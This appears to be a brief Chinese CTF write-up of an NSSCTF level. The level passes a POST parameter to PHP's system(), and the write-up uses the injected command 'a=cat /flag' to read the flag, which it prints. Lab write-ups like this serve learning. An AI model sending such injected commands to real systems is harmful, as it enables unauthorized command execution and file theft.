开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
会飞的小蛮猪29 分钟前
Jenkins运维之路(权限分配&忘记admin密码)源代码•宸1 小时前
Leetcode—2749. 得到整数零需要执行的最少操作数【中等】(__builtin_popcountl)lingggggaaaa2 小时前
小迪安全v2023学习笔记(七十八讲)—— 数据库安全&Redis&CouchDB&H2database&未授权&CVE汇能感知3 小时前
光谱相机的探测器类型艾莉丝努力练剑5 小时前
GCC编译器深度解剖:从源码到可执行文件的全面探索姚瑞南6 小时前
【AI产品思路】AI 原型设计工具横评:产品经理视角下的 v0、Bolt 与 Lovable你好~每一天6 小时前
2025年B端产品经理进阶指南:掌握这些计算机专业技能,决胜职场!源代码•宸6 小时前
Leetcode—721. 账户合并【中等】黄焖鸡能干四碗6 小时前
信息系统安全保护措施文件方案RPAdaren7 小时前
别再看人形机器人了!真正干活的机器人还有这些!